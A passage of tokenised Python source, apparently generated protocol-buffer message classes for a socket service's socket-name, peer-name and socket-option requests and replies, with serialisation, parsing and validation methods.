socket_descriptor_ ) ) <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . 
has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class GetSocketNameReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_proxy_external_ip_ = <NUM_LIT:0> <EOL> proxy_external_ip_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def proxy_external_ip ( self ) : <EOL> if self . proxy_external_ip_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . proxy_external_ip_ is None : self . proxy_external_ip_ = AddressPort ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . proxy_external_ip_ <EOL> def mutable_proxy_external_ip ( self ) : self . has_proxy_external_ip_ = <NUM_LIT:1> ; return self . proxy_external_ip ( ) <EOL> def clear_proxy_external_ip ( self ) : <EOL> if self . has_proxy_external_ip_ : <EOL> self . has_proxy_external_ip_ = <NUM_LIT:0> ; <EOL> if self . proxy_external_ip_ is not None : self . proxy_external_ip_ . Clear ( ) <EOL> def has_proxy_external_ip ( self ) : return self . has_proxy_external_ip_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . 
has_proxy_external_ip ( ) ) : self . mutable_proxy_external_ip ( ) . MergeFrom ( x . proxy_external_ip ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_proxy_external_ip_ != x . has_proxy_external_ip_ : return <NUM_LIT:0> <EOL> if self . has_proxy_external_ip_ and self . proxy_external_ip_ != x . proxy_external_ip_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( self . has_proxy_external_ip_ and not self . proxy_external_ip_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_proxy_external_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . proxy_external_ip_ . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_proxy_external_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . proxy_external_ip_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_proxy_external_ip ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_proxy_external_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . proxy_external_ip_ . ByteSize ( ) ) <EOL> self . proxy_external_ip_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_proxy_external_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . proxy_external_ip_ . ByteSizePartial ( ) ) <EOL> self . proxy_external_ip_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_proxy_external_ip ( ) . 
TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_proxy_external_ip_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . proxy_external_ip_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kproxy_external_ip = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class GetPeerNameRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . 
has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . 
socket_descriptor_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> # Generated reply message for GetPeerName: an optional nested AddressPort peer_ip, allocated lazily on first access. <EOL> class GetPeerNameReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_peer_ip_ = <NUM_LIT:0> <EOL> peer_ip_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> # Lazy accessor: allocates the nested AddressPort on first use, double-checked under lazy_init_lock_ . <EOL> def peer_ip ( self ) : <EOL> if self . peer_ip_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . peer_ip_ is None : self . peer_ip_ = AddressPort ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . peer_ip_ <EOL> def mutable_peer_ip ( self ) : self . has_peer_ip_ = <NUM_LIT:1> ; return self . peer_ip ( ) <EOL> def clear_peer_ip ( self ) : <EOL> if self . has_peer_ip_ : <EOL> self . has_peer_ip_ = <NUM_LIT:0> ; <EOL> if self . peer_ip_ is not None : self . peer_ip_ . Clear ( ) <EOL> def has_peer_ip ( self ) : return self . has_peer_ip_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_peer_ip ( ) ) : self . mutable_peer_ip ( ) . MergeFrom ( x . peer_ip ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_peer_ip_ != x . has_peer_ip_ : return <NUM_LIT:0> <EOL> if self . has_peer_ip_ and self . peer_ip_ != x . 
peer_ip_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( self . has_peer_ip_ and not self . peer_ip_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_peer_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . peer_ip_ . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_peer_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . peer_ip_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_peer_ip ( ) <EOL> # Encoders: the nested message is emitted length-delimited, and only when the presence bit is set. <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_peer_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . peer_ip_ . ByteSize ( ) ) <EOL> self . peer_ip_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_peer_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . peer_ip_ . ByteSizePartial ( ) ) <EOL> self . peer_ip_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_peer_ip ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_peer_ip_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . peer_ip_ . 
__str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kpeer_ip = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> # Generated message describing one socket option: a level (SOCKET_SOL_*), an option name constant, and the raw option value. <EOL> class SocketOption ( ProtocolBuffer . ProtocolMessage ) : <EOL> SOCKET_SOL_IP = <NUM_LIT:0> <EOL> SOCKET_SOL_SOCKET = <NUM_LIT:1> <EOL> SOCKET_SOL_TCP = <NUM_LIT:6> <EOL> SOCKET_SOL_UDP = <NUM_LIT> <EOL> _SocketOptionLevel_NAMES = { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> } <EOL> def SocketOptionLevel_Name ( cls , x ) : return cls . _SocketOptionLevel_NAMES . 
get ( x , "<STR_LIT>" ) <EOL> SocketOptionLevel_Name = classmethod ( SocketOptionLevel_Name ) <EOL> SOCKET_SO_DEBUG = <NUM_LIT:1> <EOL> SOCKET_SO_REUSEADDR = <NUM_LIT:2> <EOL> SOCKET_SO_TYPE = <NUM_LIT:3> <EOL> SOCKET_SO_ERROR = <NUM_LIT:4> <EOL> SOCKET_SO_DONTROUTE = <NUM_LIT:5> <EOL> SOCKET_SO_BROADCAST = <NUM_LIT:6> <EOL> SOCKET_SO_SNDBUF = <NUM_LIT:7> <EOL> SOCKET_SO_RCVBUF = <NUM_LIT:8> <EOL> SOCKET_SO_KEEPALIVE = <NUM_LIT:9> <EOL> SOCKET_SO_OOBINLINE = <NUM_LIT:10> <EOL> SOCKET_SO_LINGER = <NUM_LIT> <EOL> SOCKET_SO_RCVTIMEO = <NUM_LIT:20> <EOL> SOCKET_SO_SNDTIMEO = <NUM_LIT> <EOL> SOCKET_IP_TOS = <NUM_LIT:1> <EOL> SOCKET_IP_TTL = <NUM_LIT:2> <EOL> SOCKET_IP_HDRINCL = <NUM_LIT:3> <EOL> SOCKET_IP_OPTIONS = <NUM_LIT:4> <EOL> SOCKET_TCP_NODELAY = <NUM_LIT:1> <EOL> SOCKET_TCP_MAXSEG = <NUM_LIT:2> <EOL> SOCKET_TCP_CORK = <NUM_LIT:3> <EOL> SOCKET_TCP_KEEPIDLE = <NUM_LIT:4> <EOL> SOCKET_TCP_KEEPINTVL = <NUM_LIT:5> <EOL> SOCKET_TCP_KEEPCNT = <NUM_LIT:6> <EOL> SOCKET_TCP_SYNCNT = <NUM_LIT:7> <EOL> SOCKET_TCP_LINGER2 = <NUM_LIT:8> <EOL> SOCKET_TCP_DEFER_ACCEPT = <NUM_LIT:9> <EOL> SOCKET_TCP_WINDOW_CLAMP = <NUM_LIT:10> <EOL> SOCKET_TCP_INFO = <NUM_LIT:11> <EOL> SOCKET_TCP_QUICKACK = <NUM_LIT:12> <EOL> # NOTE(review): option numbers alias across levels (SO_*, IP_* and TCP_* reuse the same small integers), so this dict literal repeats keys; Python keeps only the last duplicate, and SocketOptionName_Name therefore returns the last-registered name for an aliased value. <EOL> _SocketOptionName_NAMES = { <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:7> : "<STR_LIT>" , <EOL> <NUM_LIT:8> : "<STR_LIT>" , <EOL> <NUM_LIT:9> : "<STR_LIT>" , <EOL> <NUM_LIT:10> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:20> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> 
<NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:7> : "<STR_LIT>" , <EOL> <NUM_LIT:8> : "<STR_LIT>" , <EOL> <NUM_LIT:9> : "<STR_LIT>" , <EOL> <NUM_LIT:10> : "<STR_LIT>" , <EOL> <NUM_LIT:11> : "<STR_LIT>" , <EOL> <NUM_LIT:12> : "<STR_LIT>" , <EOL> } <EOL> def SocketOptionName_Name ( cls , x ) : return cls . _SocketOptionName_NAMES . get ( x , "<STR_LIT>" ) <EOL> SocketOptionName_Name = classmethod ( SocketOptionName_Name ) <EOL> has_level_ = <NUM_LIT:0> <EOL> level_ = <NUM_LIT:0> <EOL> has_option_ = <NUM_LIT:0> <EOL> option_ = <NUM_LIT:0> <EOL> has_value_ = <NUM_LIT:0> <EOL> value_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def level ( self ) : return self . level_ <EOL> def set_level ( self , x ) : <EOL> self . has_level_ = <NUM_LIT:1> <EOL> self . level_ = x <EOL> def clear_level ( self ) : <EOL> if self . has_level_ : <EOL> self . has_level_ = <NUM_LIT:0> <EOL> self . level_ = <NUM_LIT:0> <EOL> def has_level ( self ) : return self . has_level_ <EOL> def option ( self ) : return self . option_ <EOL> def set_option ( self , x ) : <EOL> self . has_option_ = <NUM_LIT:1> <EOL> self . option_ = x <EOL> def clear_option ( self ) : <EOL> if self . has_option_ : <EOL> self . has_option_ = <NUM_LIT:0> <EOL> self . option_ = <NUM_LIT:0> <EOL> def has_option ( self ) : return self . has_option_ <EOL> def value ( self ) : return self . value_ <EOL> def set_value ( self , x ) : <EOL> self . has_value_ = <NUM_LIT:1> <EOL> self . value_ = x <EOL> def clear_value ( self ) : <EOL> if self . has_value_ : <EOL> self . has_value_ = <NUM_LIT:0> <EOL> self . value_ = "<STR_LIT>" <EOL> def has_value ( self ) : return self . has_value_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_level ( ) ) : self . set_level ( x . level ( ) ) <EOL> if ( x . has_option ( ) ) : self . set_option ( x . option ( ) ) <EOL> if ( x . has_value ( ) ) : self . set_value ( x . 
value ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_level_ != x . has_level_ : return <NUM_LIT:0> <EOL> if self . has_level_ and self . level_ != x . level_ : return <NUM_LIT:0> <EOL> if self . has_option_ != x . has_option_ : return <NUM_LIT:0> <EOL> if self . has_option_ and self . option_ != x . option_ : return <NUM_LIT:0> <EOL> if self . has_value_ != x . has_value_ : return <NUM_LIT:0> <EOL> if self . has_value_ and self . value_ != x . value_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> # All three fields (level, option, value) are required: each missing one is recorded in debug_strs when provided. <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_level_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_option_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_value_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthVarInt64 ( self . level_ ) <EOL> n += self . lengthVarInt64 ( self . option_ ) <EOL> n += self . lengthString ( len ( self . value_ ) ) <EOL> return n + <NUM_LIT:3> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_level_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . level_ ) <EOL> if ( self . has_option_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . option_ ) <EOL> if ( self . has_value_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . value_ ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_level ( ) <EOL> self . clear_option ( ) <EOL> self . clear_value ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . level_ ) <EOL> out . 
putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . option_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . value_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_level_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . level_ ) <EOL> if ( self . has_option_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . option_ ) <EOL> if ( self . has_value_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . value_ ) <EOL> # Decode the two varint fields and the length-prefixed value; unknown tags are skipped, tag 0 raises. <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:8> : <EOL> self . set_level ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_option ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_value ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_level_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . level_ ) ) <EOL> if self . has_option_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . option_ ) ) <EOL> if self . has_value_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . value_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . 
get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> klevel = <NUM_LIT:1> <EOL> koption = <NUM_LIT:2> <EOL> kvalue = <NUM_LIT:3> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT:value>" , <EOL> } , <NUM_LIT:3> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:3> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> # Generated request for SetSocketOptions: a required socket_descriptor plus repeated nested SocketOption entries. <EOL> class SetSocketOptionsRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> self . options_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def options_size ( self ) : return len ( self . options_ ) <EOL> def options_list ( self ) : return self . options_ <EOL> def options ( self , i ) : <EOL> return self . options_ [ i ] <EOL> def mutable_options ( self , i ) : <EOL> return self . options_ [ i ] <EOL> def add_options ( self ) : <EOL> x = SocketOption ( ) <EOL> self . options_ . 
append ( x ) <EOL> return x <EOL> def clear_options ( self ) : <EOL> self . options_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> for i in xrange ( x . options_size ( ) ) : self . add_options ( ) . CopyFrom ( x . options ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> if len ( self . options_ ) != len ( x . options_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . options_ , x . options_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> # Valid only when socket_descriptor is set and every nested option is itself initialized. <EOL> def IsInitialized ( self , 